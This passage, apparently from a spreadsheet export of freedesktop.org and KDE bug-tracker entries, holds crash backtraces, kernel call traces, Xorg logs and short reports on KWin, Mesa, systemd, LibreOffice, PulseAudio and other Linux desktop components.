Application: kwin (4.4.92 (KDE 4.4.92 (KDE 4.5 RC2)))
KDE Platform Version: 4.4.92 (KDE 4.4.92 (KDE 4.5 RC2)) (Compiled from sources)
Qt Version: 4.7.0
Operating System: Linux 2.6.35-rc5 x86_64
Distribution: Gentoo Base System release 2.0.1
Kernel 2.6.35-rc5
xorg-server Git master
xf86-video-ati Git master using DRI2/KMS
Mesa Git master
libdrm from Git master
-- Information about the crash:
In System Settings when I change some options in the Advanced tab of
Desktop Effects (like changing VSync and direct rendering) KWin crashes.
The crash can be reproduced every time.
-- Backtrace:
Application: KWin (kwin) signal: Segmentation fault
[KCrash Handler]
#6  DRI2WireToEvent (dpy= event=
wire=) at dri2.c:105
#7  0x0000003002444f1e in _XEnq (dpy= event=&lt;value
optimized out&gt;) at XlibInt.c:2431
#8  0x000000300244ca13 in handle_response (dpy=
response= in_XReply=) at
xcb_io.c:279
#9  0x000000300244cfa0 in _XReply (dpy= rep=&lt;value
optimized out&gt; extra= discard=) at
xcb_io.c:554
#10 0x00000030024409e2 in XSync (dpy= discard=&lt;value
optimized out&gt;) at Sync.c:46
#11 0x0000003008c5296f in DRI2DestroyDrawable (dpy=
drawable=) at dri2.c:350
#12 0x0000003008c51584 in dri2DestroyDrawable (pdraw=) at
dri2_glx.c:174
#13 0x0000003008c4bab3 in DestroyDRIDrawable (dpy=
drawable= destroy_xdrawable=) at
glx_pbuffer.c:225
#14 0x0000003080ac4dc2 in KWin::SceneOpenGL::Texture::release (this=&lt;value
optimized out&gt;) at
/var/tmp/portage/kde-base/kwin-4.4.92/work/kwin-4.4.92/kwin/scene_opengl.cpp:1009
#15 0x0000003080ac5151 in KWin::SceneOpenGL::Texture::discard (this=&lt;value
optimized out&gt;) at
/var/tmp/portage/kde-base/kwin-4.4.92/work/kwin-4.4.92/kwin/scene_opengl.cpp:999
#16 0x0000003080ac516d in KWin::SceneOpenGL::Window::discardTexture
(this=) at
/var/tmp/portage/kde-base/kwin-4.4.92/work/kwin-4.4.92/kwin/scene_opengl.cpp:1331
#17 0x0000003080ac5283 in ~Window (this= __in_chrg=&lt;value
optimized out&gt;) at
/var/tmp/portage/kde-base/kwin-4.4.92/work/kwin-4.4.92/kwin/scene_opengl.cpp:1304
#18 0x0000003080ac67dc in KWin::SceneOpenGL::windowClosed (this=&lt;value
optimized out&gt; c= deleted=)
    at
/var/tmp/portage/kde-base/kwin-4.4.92/work/kwin-4.4.92/kwin/scene_opengl.cpp:933
#19 0x0000003080ab30d9 in KWin::Workspace::finishCompositing (this=&lt;value
optimized out&gt;) at
/var/tmp/portage/kde-base/kwin-4.4.92/work/kwin-4.4.92/kwin/composite.cpp:258
#20 0x0000003080ab6489 in KWin::Workspace::fallbackToXRenderCompositing
(this=) at
/var/tmp/portage/kde-base/kwin-4.4.92/work/kwin-4.4.92/kwin/composite.cpp:301
#21 0x0000003080a36768 in KWin::Workspace::qt_metacall (this=&lt;value optimized
out&gt; _c= _id= _a=&lt;value optimized
out&gt;)
    at
/var/tmp/portage/kde-base/kwin-4.4.92/work/kwin-4.4.92_build/kwin/workspace.moc:582
#22 0x0000003009f77bbe in QObject::event (this= e=&lt;value
optimized out&gt;) at kernel/qobject.cpp:1211
#23 0x00000030137b031c in QApplicationPrivate::notify_helper (this=&lt;value
optimized out&gt; receiver= e=) at
kernel/qapplication.cpp:4389
#24 0x00000030137b5e8d in QApplication::notify (this=
receiver= e=) at
kernel/qapplication.cpp:4270
#25 0x0000003015639c36 in KApplication::notify (this=
receiver= event=)
    at
/var/tmp/portage/kde-base/kdelibs-4.4.92/work/kdelibs-4.4.92/kdeui/kernel/kapplication.cpp:309
#26 0x0000003009f65f3b in QCoreApplication::notifyInternal (this=&lt;value
optimized out&gt; receiver= event=) at
kernel/qcoreapplication.cpp:732
#27 0x0000003009f68e41 in QCoreApplication::sendEvent (receiver=&lt;value
optimized out&gt; event_type= data=)
at kernel/qcoreapplication.h:215
#28 QCoreApplicationPrivate::sendPostedEvents (receiver=
event_type= data=) at
kernel/qcoreapplication.cpp:1373
#29 0x0000003013861214 in QCoreApplication::sendPostedEvents (this=&lt;value
optimized out&gt; flags=) at
../../include/QtCore/../../src/corelib/kernel/qcoreapplication.h:220
#30 QEventDispatcherX11::processEvents (this=
flags=) at kernel/qeventdispatcher_x11.cpp:75
#31 0x0000003009f64c92 in QEventLoop::processEvents (this=&lt;value optimized
out&gt; flags=) at kernel/qeventloop.cpp:149
#32 0x0000003009f65074 in QEventLoop::exec (this=
flags=) at kernel/qeventloop.cpp:201
#33 0x0000003009f690cb in QCoreApplication::exec () at
kernel/qcoreapplication.cpp:1009
#34 0x0000003080a52d8d in kdemain (argc= argv=&lt;value
optimized out&gt;) at
/var/tmp/portage/kde-base/kwin-4.4.92/work/kwin-4.4.92/kwin/main.cpp:531
#35 0x000000300041ebbd in __libc_start_main (main=
argc= ubp_av= init=&lt;value optimized
out&gt; fini= 
    rtld_fini= stack_end=) at libc-start.c:226
#36 0x00000000004006c9 in _start ()</t>
  </si>
  <si>
    <t>realnc</t>
  </si>
  <si>
    <t>POPPLER-45441</t>
  </si>
  <si>
    <t>Fix return value of downscale_box_filter()</t>
  </si>
  <si>
    <t>Going through the warnings while compiling poppler I noticed the retval
variable in downscale_box_filter() was not used at all. I think it should
actually be used as the return value.
Patch follows.</t>
  </si>
  <si>
    <t>WAYLAND-90980</t>
  </si>
  <si>
    <t>Palm detection prevents edge scrolling</t>
  </si>
  <si>
    <t>Following with the next problem I find. Using the border to scroll instead of the 2 finger scrolling it seems to pick the wrong position for the border and in a few milimeters more to the left out of the border.
Please let me know what information you need to get the right size of the touchpad.</t>
  </si>
  <si>
    <t>SYSTEMD-50671</t>
  </si>
  <si>
    <t>systemd-detect-virt expects argument for --quiet (but not -q)</t>
  </si>
  <si>
    <t>With systemd 184 (systemd-tools-184-1 on Archlinux) running
  systemd-detect-virt --quiet
produces the error
  systemd-detect-virt: option '--quiet' requires an argument
The man page does not say that this is the case and indeed
  systemd-detect-virt -q
which should be synonymous works fine.</t>
  </si>
  <si>
    <t>MESA-14503</t>
  </si>
  <si>
    <t>[965] celestia has sparkly rendering of earth</t>
  </si>
  <si>
    <t>Rotating the earth with right-click-drag there's a consistent but incorrect rendering of the lighting of the planet (concentric white stripes).</t>
  </si>
  <si>
    <t>PULSEAUDIO-61800</t>
  </si>
  <si>
    <t>PA incorrectly reports modules with unresolved symbols as missing</t>
  </si>
  <si>
    <t>Created attachment 75901
Patch to call dlerror() in bind_now_open() for better reporting of module loading problems
If a module exists but some of the symbols in it can't be resolved the following happens:
E: [] module.c: Failed to open module module-coreaudio-detect: file not found
Even though the file is clearly present in the modules directory. This is very confusing. 
This is because bind_now_open() in src/daemon/ltdl-bind-now.c assumes any problem with dlopen is due to a missing file.
The attached patch makes it call dlerror() to report something more useful.</t>
  </si>
  <si>
    <t>vtroshchinskiy</t>
  </si>
  <si>
    <t>LIBREOFFICE-62291</t>
  </si>
  <si>
    <t>WIKIHELP: Mention of un-evaluated variable %PRODUCTVERSION on Fontwork_1 page</t>
  </si>
  <si>
    <t>https://help.libreoffice.org/Common/Fontwork_1
Here's the variable in context:
---
This Fontwork dialog is only available for Fontwork in old Writer text documents that were created prior to LibreOffice %PRODUCTVERSION.
---
The variable should either be evaluated to a number or (probably better) replaced with a static value.</t>
  </si>
  <si>
    <t>LIBREOFFICE-56515</t>
  </si>
  <si>
    <t>gerrit theming should him at developer IRC channel</t>
  </si>
  <si>
    <t>As discussed on:
 https://plus.google.com/101094190333184858950/posts/H886dGcr3hS
it would be great to invite people on gerrit to the #libreoffice-dev channel on freenode.
Can we add a line to the header or footer saying: If you need help with your patch or want to discuss it do not hesitate to join #libreoffice-dev on freenode IRC (irc://chat.freenode.net/libreoffice-dev). If you need help with gerrit itself please send a email to gerrit@otrs.documentfoundation.org.
That would be awesome!</t>
  </si>
  <si>
    <t>d.ostrovsky</t>
  </si>
  <si>
    <t>DRI-22226</t>
  </si>
  <si>
    <t>[945] DRI memory manager reports 18014398509481940 kB</t>
  </si>
  <si>
    <t>Xorg.0.log:
[snip]
(II) AIGLX: Resuming AIGLX clients after VT switch
(II) intel(0): Fixed memory allocation layout:
(II) intel(0): 0x00000000-0xffffffffffff4fff: DRI memory manager (18014398509481940 kB)
(II) intel(0): 0x00000000:            end of aperture
(II) intel(0): BO memory allocation layout:
(II) intel(0): 0x00000000:            start of memory manager
(II) intel(0): 0x00c00000-0x00ffffff: front buffer (4096 kB) X tiled
(II) intel(0): 0x00b00000-0x00b09fff: HW cursors (40 kB)
(II) intel(0): 0xffffffffffff5000:            end of memory manager
[/snip]
Chipset: 945GM
(--) PCI:*(0@0:2:0) Intel Corporation Mobile 945GM/GMS 943/940GML Express Integrated Graphics Controller rev 3 Mem @ 0xee100000/524288 0xd0000000/268435456 0xee200000/262144 I/O @ 0x00001800/8
(--) PCI: (0@0:2:1) Intel Corporation Mobile 945GM/GMS/GME 943/940GML Express Integrated Graphics Controller rev 3 Mem @ 0xee180000/524288
Kernel: 2.6.30
Arch: x86_64
Distro: Gentoo
Machine: Lenovo x60s (Thinkpad)
x11-libs/libdrm-2.4.11
media-libs/mesa-7.4.2
x11-base/xorg-server-1.6.1.901-r3
x11-drivers/xf86-video-intel-2.7.1</t>
  </si>
  <si>
    <t>plaes</t>
  </si>
  <si>
    <t>DRI-89036</t>
  </si>
  <si>
    <t>[SKL regression] 3 pipe displays cannot work together randomly(fail rate: 20%)</t>
  </si>
  <si>
    <t>==System Environment==
--------------------------
Regression: not sure
Non-working platforms: SKL
==kernel==
--------------------------
drm-intel-nightly(2015_02_08)/b4442e
==Bug detailed description==
-----------------------------
The Linux graphics driver for Skylake will support Display Concurrency - 1 embedded + 2 external up to max supported resolution all with blend scale and rotate.
3 pipe doesn't work on SKL with latest (2015_02_08) -nightly branch.
At the moment two combinations eDP+DP and eDP+HDMI work well.</t>
  </si>
  <si>
    <t>SWFDEC-18029</t>
  </si>
  <si>
    <t>make check fails on Mandriva Cooker - INFO: Testing crash-0.7.1-uncompressed-half-samples-5.swf</t>
  </si>
  <si>
    <t>When running make check in Mandriva Linux Cooker I'm getting the following:
{{{{{{{{{{
INFO: Testing crash-0.7.1-throw-6.swf
  OK                                 
INFO: Testing crash-0.7.1-throw-7.swf
  OK                                 
INFO: Testing crash-0.7.1-throw-8.swf
  OK
INFO: Testing crash-0.7.1-uncompressed-half-samples-5.swf
SWFDEC: ERROR: swfdec_audio_decoder_uncompressed.c(59): swfdec_audio_decoder_uncompressed_upscale: incorrect buffer size 1 bytes overhead
/bin/sh: line 1:  6116 Aborted                 $CUR_DIR/../swfdec-test *.swf
make[4]: *** [check-local] Error 134
make[4]: Leaving directory `/home/shlomi/Download/unpack/net/www/swfdec/swfdec/test/trace'
make[3]: *** [check-am] Error 2
make[3]: Leaving directory `/home/shlomi/Download/unpack/net/www/swfdec/swfdec/test/trace'
make[2]: *** [check-recursive] Error 1
make[2]: Leaving directory `/home/shlomi/Download/unpack/net/www/swfdec/swfdec/test'
make[1]: *** [check] Error 2
make[1]: Leaving directory `/home/shlomi/Download/unpack/net/www/swfdec/swfdec/test'
make: *** [check-recursive] Error 1
shlomi:~/Download/unpack/net/www/swfdec/swfdec$
}}}}}}}}}}
So the make check fails</t>
  </si>
  <si>
    <t>DRI-76725</t>
  </si>
  <si>
    <t>[ILK/HSW/BYT/BDW bisected]System booting up with call traces â€drm_helper_probe_single_connector_modesâ€œ in drm_crtc_helper.c and â€drm_mode_probed_addâ€ in drm_modes.c</t>
  </si>
  <si>
    <t>Created attachment 96516
Call trace dmesg
system Environment:
--------------------------
platform: BDW HSW ILK BYT
Kernel:	(drm-intel-next-queued) 57e00b2e1b348b3855f4a3b681d583f8c9cf39fb
Bug detailed description:
-------------------------
CallTrace WARNING: CPU: 0 PID: 1418 at drivers/gpu/drm/drm_modes.c:119 drm_mode_probed_add+0x27/0x41 [drm]() and WARNING: CPU: 0 PID: 1418 at drivers/gpu/drm/drm_crtc_helper.c:131  after booting. 
these two calltrace occurs by the same patch.
The first bad point is 3ec0db819315c765b3c7bbf7e9dee2fe1f186f47
commit 3ec0db819315c765b3c7bbf7e9dee2fe1f186f47
Author: Daniel Vetter 
Date:   Thu Jan 23 15:06:15 2014 +0100
    drm/doc: Integrate drm_modes.c kerneldoc
    And clean it up so that there's no kerneldoc warnings. There's still a
    lot to do with this one here.
    Reviewed-by: Alex Deucher 
    Signed-off-by: Daniel Vetter 
Reproduce steps:
--------------------
1. Booting the OS
2. dmesg|grep Call
CallTrace1
--------------------
[    1.661620] WARNING: CPU: 0 PID: 1418 at drivers/gpu/drm/drm_modes.c:119 drm_mode_probed_add+0x27/0x41 [drm]()
[    1.661627] Modules linked in: i915(+) video button drm_kms_helper drm
[    1.661640] CPU: 0 PID: 1418 Comm: udevd Tainted: G        W    3.14.0-rc7_drm-intel-next-queued_57e00b_20140326+ #1042
[    1.661647]  0000000000000000 0000000000000009 ffffffff81716de3 0000000000000000
[    1.661656]  ffffffff81035052 000000000000001e ffffffffa0010754 ffff8800a6f4d6c8
[    1.661665]  ffff88014697b400 ffff880149e54800 0000000000000458 0000000000000004
[    1.661673] Call Trace:
[    1.661679]  [] ? dump_stack+0x41/0x51
[    1.661686]  [] ? warn_slowpath_common+0x73/0x8b
[    1.661697]  [] ? drm_mode_probed_add+0x27/0x41 [drm]
[    1.661708]  [] ? drm_mode_probed_add+0x27/0x41 [drm]
[    1.661720]  [] ? do_detailed_mode+0x356/0x36e [drm]
[    1.661729]  [] ? console_unlock+0x2c3/0x300
[    1.661740]  [] ? do_established_modes+0xce/0xce [drm]
[    1.661751]  [] ? drm_for_each_detailed_block+0x36/0xf3 [drm]
[    1.661760]  [] ? idr_mark_full+0x40/0x49
[    1.661771]  [] ? drm_add_edid_modes+0x148/0xd02 [drm]
[    1.661785]  [] ? drm_mode_object_get+0x51/0x60 [drm]
[    1.661828]  [] ? intel_connector_update_modes+0x1c/0x36 [i915]
[    1.661870]  [] ? intel_dp_get_modes+0x4e/0xb2 [i915]
[    1.661879]  [] ? drm_helper_probe_single_connector_modes+0x138/0x2d2 [drm_kms_helper]
[    1.661890]  [] ? drm_fb_helper_probe_connector_modes+0x38/0x4c [drm_kms_helper]
[    1.661900]  [] ? drm_fb_helper_initial_config+0x1ab/0x450 [drm_kms_helper]
[    1.661909]  [] ? kmem_cache_alloc+0x23/0xac
[    1.661947]  [] ? gen8_write32+0x22/0x89 [i915]
[    1.661981]  [] ? gen6_read32+0x76/0x81 [i915]
[    1.662011]  [] ? gen8_write32+0x22/0x89 [i915]
[    1.662053]  [] ? i915_driver_load+0xbad/0xe1e [i915]
[    1.662068]  [] ? drm_dev_register+0x74/0xe7 [drm]
[    1.662082]  [] ? drm_get_pci_dev+0xff/0x1bc [drm]
[    1.662089]  [] ? __pm_runtime_resume+0x5b/0x6a
[    1.662097]  [] ? local_pci_probe+0x35/0x7a
[    1.662105]  [] ? driver_probe_device+0x1b3/0x1b3
[    1.662113]  [] ? pci_device_probe+0xcc/0xf0
[    1.662120]  [] ? driver_probe_device+0x92/0x1b3
[    1.662135]  [] ? __driver_attach+0x53/0x73
[    1.662142]  [] ? bus_for_each_dev+0x4e/0x7f
[    1.662149]  [] ? bus_add_driver+0xe2/0x1c7
[    1.662155]  [] ? driver_register+0x82/0xb5
[    1.662159]  [] ? 0xffffffffa00fbfff
[    1.662163]  [] ? do_one_initcall+0x78/0xfa
[    1.662168]  [] ? __blocking_notifier_call_chain+0x4f/0x5d
[    1.662174]  [] ? load_module+0x1745/0x1a13
[    1.662179]  [] ? mod_kobject_put+0x42/0x42
[    1.662184]  [] ? SyS_init_module+0x90/0x9b
[    1.662190]  [] ? system_call_fastpath+0x16/0x1b
[    1.662193] ---[ end trace 47b212a61ac14e5a ]---
[    1.662199] [drm:drm_edid_to_eld] ELD: no CEA Extension found
CallTrace2
--------------------
[    1.662518] WARNING: CPU: 0 PID: 1418 at drivers/gpu/drm/drm_crtc_helper.c:131 drm_helper_probe_single_connector_modes+0x3f/0x2d2 [drm_kms_helper]()
[    1.662523] Modules linked in: i915(+) video button drm_kms_helper drm
[    1.662530] CPU: 0 PID: 1418 Comm: udevd Tainted: G        W    3.14.0-rc7_drm-intel-next-queued_57e00b_20140326+ #1042
[    1.662534]  0000000000000000 0000000000000009 ffffffff81716de3 0000000000000000
[    1.662539]  ffffffff81035052 ffff880100000438 ffffffffa00464ba ffff88010000043e
[    1.662544]  ffff880149e53400 0000000000000001 ffff8800a6c82000 0000000000002000
[    1.662549] Call Trace:
[    1.662554]  [] ? dump_stack+0x41/0x51
[    1.662558]  [] ? warn_slowpath_common+0x73/0x8b
[    1.662563]  [] ? drm_helper_probe_single_connector_modes+0x3f/0x2d2 [drm_kms_helper]
[    1.662569]  [] ? drm_helper_probe_single_connector_modes+0x3f/0x2d2 [drm_kms_helper]
[    1.662576]  [] ? drm_fb_helper_probe_connector_modes+0x38/0x4c [drm_kms_helper]
[    1.662582]  [] ? drm_fb_helper_initial_config+0x1ab/0x450 [drm_kms_helper]
[    1.662588]  [] ? kmem_cache_alloc+0x23/0xac
[    1.662615]  [] ? gen8_write32+0x22/0x89 [i915]
[    1.662639]  [] ? gen6_read32+0x76/0x81 [i915]
[    1.662661]  [] ? gen8_write32+0x22/0x89 [i915]
[    1.662693]  [] ? i915_driver_load+0xbad/0xe1e [i915]
[    1.662704]  [] ? drm_dev_register+0x74/0xe7 [drm]
[    1.662714]  [] ? drm_get_pci_dev+0xff/0x1bc [drm]
[    1.662718]  [] ? __pm_runtime_resume+0x5b/0x6a
[    1.662723]  [] ? local_pci_probe+0x35/0x7a
[    1.662729]  [] ? driver_probe_device+0x1b3/0x1b3
[    1.662734]  [] ? pci_device_probe+0xcc/0xf0
[    1.662739]  [] ? driver_probe_device+0x92/0x1b3
[    1.662744]  [] ? __driver_attach+0x53/0x73
[    1.662749]  [] ? bus_for_each_dev+0x4e/0x7f
[    1.662754]  [] ? bus_add_driver+0xe2/0x1c7
[    1.662759]  [] ? driver_register+0x82/0xb5
[    1.662763]  [] ? 0xffffffffa00fbfff
[    1.662767]  [] ? do_one_initcall+0x78/0xfa
[    1.662772]  [] ? __blocking_notifier_call_chain+0x4f/0x5d
[    1.662778]  [] ? load_module+0x1745/0x1a13
[    1.662783]  [] ? mod_kobject_put+0x42/0x42
[    1.662788]  [] ? SyS_init_module+0x90/0x9b
[    1.662793]  [] ? system_call_fastpath+0x16/0x1b
[    1.662797] ---[ end trace 47b212a61ac14e5c ]---
[    1.662800] [drm:drm_helper_probe_single_connector_modes] [CONNECTOR:18:DP-1]
[    1.662803] [drm:intel_dp_detect] [CONNECTOR:18:DP-1]
[    1.662808] [drm:drm_helper_probe_single_connector_modes] [CONNECTOR:18:DP-1] disconnected</t>
  </si>
  <si>
    <t>MESA-95515</t>
  </si>
  <si>
    <t>[ILK] GPU HANG: ecode 5:0:0xb5cefffc in compiz [3365] reason: Ring hung action: reset</t>
  </si>
  <si>
    <t>Created attachment 123953
dmesg from boot
Upon unsuspend (but only once in a dozen times) the X login display freezes.  Ctrl-Alt-F1 also does not work.
After 10 to 15 secs display continues normally.
In the attached logs freeze was at 50722</t>
  </si>
  <si>
    <t>ghane0</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-95486</t>
  </si>
  <si>
    <t>Rename xdg-app project resource to flatpak</t>
  </si>
  <si>
    <t>The xdg-app project is being renamed to Flatpak so I would like the various resources on freedesktop.org to be renamed too.
GIT:
https://cgit.freedesktop.org/xdg-app  =&gt; https://cgit.freedesktop.org/flatpak
https://cgit.freedesktop.org/xdg-app/xdg-app =&gt; https://cgit.freedesktop.org/flatpak/flatpak
Bugzilla: 
product xdg-app =&gt; flatpak
Web:
https://www.freedesktop.org/software/xdg-app/ =&gt; 
  https://www.freedesktop.org/software/flatpak/ =&gt; 
Ideally with a symlink from the old name to the new.
Mailing list:
https://lists.freedesktop.org/mailman/listinfo/xdg-app
https://lists.freedesktop.org/archives/xdg-app/
And if there are any other things i've forgotten (user names? group names?)</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-87168</t>
  </si>
  <si>
    <t>cgit.freedesktop.org is unreachable</t>
  </si>
  <si>
    <t>I cannot access cgit.freedesktop.org anymore from my IP but can access it through a vpn
$ ping cgit.freedesktop.org
PING molly.freedesktop.org (131.252.210.161) 56(84) bytes of data.
^C
--- molly.freedesktop.org ping statistics ---
9 packets transmitted 0 received 100% packet loss time 8008ms
[lordh@archMain ~]$ traceroute cgit.freedesktop.org
traceroute to cgit.freedesktop.org (131.252.210.161) 30 hops max 60 byte packets
 1  192.168.0.1 (192.168.0.1)  0.176 ms  0.408 ms  0.453 ms
 2  88.169.45.254 (88.169.45.254)  27.934 ms  31.092 ms  33.561 ms
 3  lille-6k-1-a5.routers.proxad.net (213.228.12.190)  35.009 ms  36.664 ms  37.389 ms
 4  bzn-crs16-2-be1113.intf.routers.proxad.net (194.149.162.89)  42.551 ms  51.442 ms  52.158 ms
 5  bzn-9k-5-be1000.intf.routers.proxad.net (194.149.161.114)  47.460 ms  49.667 ms  50.629 ms
 6  * londres-6k-1-po104.intf.routers.proxad.net (194.149.161.238)  70.042 ms  71.145 ms
 7  amsterdam-6k-1-po100.intf.routers.proxad.net (212.27.56.42)  68.428 ms  60.233 ms *
 8  francfort-6k-1-po101.intf.routers.proxad.net (212.27.56.37)  55.425 ms  57.846 ms  60.057 ms
 9  * * *
10  100ge3-1.core1.ams1.he.net (72.52.92.5)  85.646 ms  86.785 ms  86.584 ms
11  100ge9-1.core1.lon2.he.net (72.52.92.213)  83.891 ms  96.908 ms  97.854 ms
12  100ge1-1.core1.nyc4.he.net (72.52.92.166)  156.267 ms  157.041 ms  141.880 ms
13  * 100ge7-2.core1.chi1.he.net (184.105.80.37)  161.825 ms  224.225 ms
14  100ge13-1.core1.msp1.he.net (184.105.223.178)  163.235 ms  164.733 ms  166.834 ms
15  100ge9-1.core1.sea1.he.net (184.105.223.193)  211.222 ms  210.255 ms  203.360 ms
16  10ge1-3.core1.pdx1.he.net (72.52.92.10)  205.740 ms  218.159 ms *
17  portland-state-university.gigabitethernet2-15.core1.pdx1.he.net (216.218.230.90)  205.868 ms  205.854 ms  206.313 ms
18  * * *
19  * * *
20  * 131.252.5.147 (131.252.5.147)  334.027 ms  332.088 ms
21  * * *
22  * * *
23  * * *
24  * * *
25  * * *
26  * * *
27  * * *
28  * * *
29  * * *
30  * * *</t>
  </si>
  <si>
    <t>MESA-30558</t>
  </si>
  <si>
    <t>symbol lookup error: /usr/lib/egl/egl_gallium.so: undefined symbol: drmGetMagic</t>
  </si>
  <si>
    <t>I tried to execute trivial EGL program but failed with this:
symbol lookup error: /usr/lib/egl/egl_gallium.so: undefined symbol: drmGetMagic
There is a lack of libdrm.so linkage somewhere (libEGL.so? egl_gallium.so?). Linking my program with -ldrm solves this issue.</t>
  </si>
  <si>
    <t>MESA-68804</t>
  </si>
  <si>
    <t>16 re-frames video decoding stutter on UVD with radeon driver</t>
  </si>
  <si>
    <t>Created attachment 84984
dmesg
16 re-frames video decoding (and probably also 12 re-frames) stutter on UVD with radeon driver (same video is decoded fine with fglrx driver via XvBA). mplayer2 with enabled VDPAU is used for this test.
16 re-frames sample: http://www.mediafire.com/?tdukvcaj87nivn7
Radeon HD 6310
Linux 3.11 with drm-next from this folder: http://kernel.ubuntu.com/~kernel-ppa/mainline/drm-next/current/ (build 3.11.0-996.201308300442). radeon.dpm is enabled.
libdrm 2.4.46+git1308291007.f17d41
xserver-xorg-video-radeon 7.2.0+git1308270847.8927d3
Mesa 9.3~git1308301002.74be77
libvdpau1 0.7-1
mplayer2 2.0-554-gf63dbad
Ubuntu 13.04 x86_64
Driver Mesa and firmwares installed from this PPA: https://launchpad.net/~oibaf/+archive/graphics-drivers
dmesg output attached.
vdpauinfo output attached.</t>
  </si>
  <si>
    <t>MODEMMANAGER-100157</t>
  </si>
  <si>
    <t>Re-probing ports upon manual scan broken</t>
  </si>
  <si>
    <t>The probing of ports tagged as greylisted with a manual Manager.Scan() is broken because the manager object keeps the already probed (and failed) ports still around in their associated MMDevices.
The MMDevice must be untracked and removed if no modem object is created for it.</t>
  </si>
  <si>
    <t>LIBREOFFICE-53250</t>
  </si>
  <si>
    <t>: target in document targets overview displays RefHeading</t>
  </si>
  <si>
    <t>Problem description:
When I want to insert a URL and select tab Document and Target in document targets aren't displayed in alphabetical order nor is there any possibility to modify the display of targets in document.
Besides a search box would be very useful as well as buttons like Ordered by content and Ordered by name etc.
Furthermore I have many bookmarks displayed as __RefHeading_ instead any meaningful identifier.
Steps to reproduce:
1. Click on Insert
2. Click on Hyperlink
3. Click on Document
4. Click on the Target in Document button
Platform (if different from the browser): 
Gentoo Linux</t>
  </si>
  <si>
    <t>barade.barade</t>
  </si>
  <si>
    <t>CAIRO-20149</t>
  </si>
  <si>
    <t>does not yet support image format</t>
  </si>
  <si>
    <t>gEDA/gschem version 1.4.0.20080127
Error: Cairo 1.4.14 does not yet support the requested image format:
        Depth: 8
        Alpha mask: 0x00000000
        Red   mask: 0x00000000
        Green mask: 0x00000000
        Blue  mask: 0x00000000
Please file an enhancement request (quoting the above) at:
http://bugs.freedesktop.org/enter_bug.cgi?product=cairo
gschem.x: cairo-image-surface.c:199: _cairo_format_from_pixman_format: Assertion `NOT_REACHED' failed.
Abort (core dumped)
uname -a
Linux ftc5 2.4.21-50.EL #1 SMP Tue May 8 17:10:00 EDT 2007 x86_64 x86_64 x86_64 GNU/Linux</t>
  </si>
  <si>
    <t>lin_ys</t>
  </si>
  <si>
    <t>LIBREOFFICE-73322</t>
  </si>
  <si>
    <t>Native file picker is not used (Windows specific)</t>
  </si>
  <si>
    <t>Native file picker is not used even when 'Use LibreOffice Dialogs' is unchecked. Tested with a clean user profile under Windows 7 &amp; Windows XP.</t>
  </si>
  <si>
    <t>UPOWER-44734</t>
  </si>
  <si>
    <t>Created attachment 55505
add a systemd service
upower should install a systemd service file and add a SystemdService= line to its dbus-activated service.
By doing that it will be started by systemd instead of dbus.
This has the advantage that it will be treated like any other system daemon and put in its own cgroup by systemd. Also its state can be checked and it can easily be restarted or stopped if it might misbehave.
On systems without systemd dbus will start the daemon itself just like it does now.
Attached is a patch that implements this behaviour.
Like most other packages that support systemd it adds a --with-systemdsystemunitdir switch to configure.
Installation of the systemd service file can also be disabled using this configure switch.</t>
  </si>
  <si>
    <t>XORG-94130</t>
  </si>
  <si>
    <t>Unknown Card-Ids (3371|1019|2125) Chipset: P4M900/VN896/CN896</t>
  </si>
  <si>
    <t>Created attachment 121730
Log files for lspci syslog /var/log/Xorg.0.log and /var/log/lightdm/x-0.log
I've got a Qotom T26H (http://www.m.amazon.com/dp/B00MTI4JIK) that uses a VIA C7-D processor. It was purchased specifically for the processor and testing software like OpenSSL and Crypto++.
The machine is running Lubuntu 15 and the Xserver crashes during boot. The stock Ubuntu Xserver crashes and a report was filed with Lubuntu at http://bugs.launchpad.net/lightdm/+bug/1540774. After adding the Xorg PPA the Xserver provided at xorg-edgers crashes too (http://launchpad.net/~xorg-edgers/+archive/ubuntu/ppa).
There have been a number of reports sent to the openchrome-users mailing list because the log states to report the Unknown Card-Id there. I have not been able to find any reports in the bug tracker.
Here is the bug report. I hope it gets fixed before the release of OpenChrome 0.3.4 (re: Getting ready to release OpenChrome Version 0.3.4 https://lists.freedesktop.org/archives/openchrome-users/2016-February/007234.html).
The attachment includes log files for lspci syslog /var/log/Xorg.0.log and /var/log/lightdm/x-0.log when using the Xorg PPA. The stock Ubuntu gear produced the same result.
/var/log/Xorg.0.log is shown below when using the Xorg PPA. The stock Ubuntu gear produced the same result.
========================================
via:~$ cat /var/log/Xorg.0.log
[   495.454] 
X.Org X Server 1.17.2
Release Date: 2015-06-16
[   495.455] X Protocol Version 11 Revision 0
[   495.455] Build Operating System: Linux 3.13.0-68-generic i686 Ubuntu
[   495.456] Current Operating System: Linux via 4.2.0-27-generic #32-Ubuntu SMP Fri Jan 22 04:48:15 UTC 2016 i686
[   495.456] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-4.2.0-27-generic root=UUID=cfc626dc-ce95-48e1-a8c8-98c258e77415 ro ipv6.disable=1 biosdevname=0 longhaul.enable=0 audit=0 splash vt.handoff=7
[   495.458] Build Date: 12 November 2015  05:33:32PM
[   495.459] xorg-server 2:1.17.2-1ubuntu9.1 (For technical support please see http://www.ubuntu.com/support) 
[   495.459] Current version of pixman: 0.32.6
[   495.460] 	Before reporting problems check http://wiki.x.org
	to make sure that you have the latest version.
[   495.460] Markers: (--) probed (**) from config file (==) default setting
	(++) from command line (!!) notice (II) informational
	(WW) warning (EE) error (NI) not implemented (??) unknown.
[   495.462] (==) Log file: /var/log/Xorg.0.log Time: Fri Feb 12 22:57:45 2016
[   495.463] (==) Using system config directory /usr/share/X11/xorg.conf.d
[   495.464] (==) No Layout section.  Using the first Screen section.
[   495.465] (==) No screen section available. Using defaults.
[   495.465] (**) |--&gt;Screen Default Screen Section (0)
[   495.465] (**) |   |--&gt;Monitor 
[   495.465] (==) No monitor specified for screen Default Screen Section.
	Using a default monitor configuration.
[   495.465] (==) Automatically adding devices
[   495.465] (==) Automatically enabling devices
[   495.465] (==) Automatically adding GPU devices
[   495.465] (WW) The directory /usr/share/fonts/X11/cyrillic does not exist.
[   495.465] 	Entry deleted from font path.
[   495.465] (WW) The directory /usr/share/fonts/X11/100dpi/ does not exist.
[   495.465] 	Entry deleted from font path.
[   495.465] (WW) The directory /usr/share/fonts/X11/75dpi/ does not exist.
[   495.465] 	Entry deleted from font path.
[   495.465] (WW) The directory /usr/share/fonts/X11/Type1 does not exist.
[   495.465] 	Entry deleted from font path.
